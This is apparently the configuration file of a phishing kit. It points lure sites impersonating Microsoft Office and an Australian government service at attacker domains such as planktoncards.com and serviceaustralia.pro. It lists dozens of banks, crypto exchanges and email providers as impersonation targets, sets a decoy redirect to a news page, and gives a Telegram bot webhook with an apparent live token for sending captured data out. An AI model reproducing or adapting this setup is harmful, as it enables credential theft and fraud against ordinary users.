blacklist_mode: all
cookie_key: ""
ip: 159.89.114.7
lures: []
nkpbot_enabled: false
ota_enabled: false
proxy_address: ""
proxy_enabled: false
proxy_password: ""
proxy_port: 0
proxy_type: http
proxy_username: ""
redirect_key: vo
redirect_url: https://apnews.com/live/trump-presidency-updates-2-18-2025
server: planktoncards.com
simplebot_enabled: false
site_domains:
    amazon: ""
    aws: ""
    binance: ""
    blockchain: ""
    boa: ""
    bypass-flagged: ""
    canada: ""
    cex: ""
    chase: ""
    coinbase: ""
    cryptobox: ""
    dashlane: ""
    discord: ""
    dropbox: ""
    europol: ""
    facebook: ""
    flexiti: ""
    gemini: ""
    gend: ""
    github: ""
    glady: ""
    google: ""
    gov: serviceaustralia.pro
    hightail: ""
    icloud: ""
    instagram: ""
    knowbe4: ""
    lastpass: ""
    lcl: ""
    linkedin: ""
    mail: ""
    mailgun: ""
    nsbank: ""
    o365: ""
    office: planktoncards.com
    outlook: ""
    ovh: ""
    payfit: ""
    payoneer: ""
    paypal: ""
    poloniex: ""
    protonmail: ""
    sendgrid: ""
    skrill: ""
    skype: ""
    snapchat: ""
    stripe: ""
    tiktok: ""
    twitter: ""
    xfinity: google2.com
    yahoo: ""
sites_enabled:
    - gov
    - office
turnstile_privkey: ""
turnstile_sitekey: ""
verification_key: mf
verification_token: d88e
webhook_telegram: 6019079233:AAEjGWsqmN5_alqV-yblTKUG0U6C3htidus/5889418416
webhook_verbosity: 1
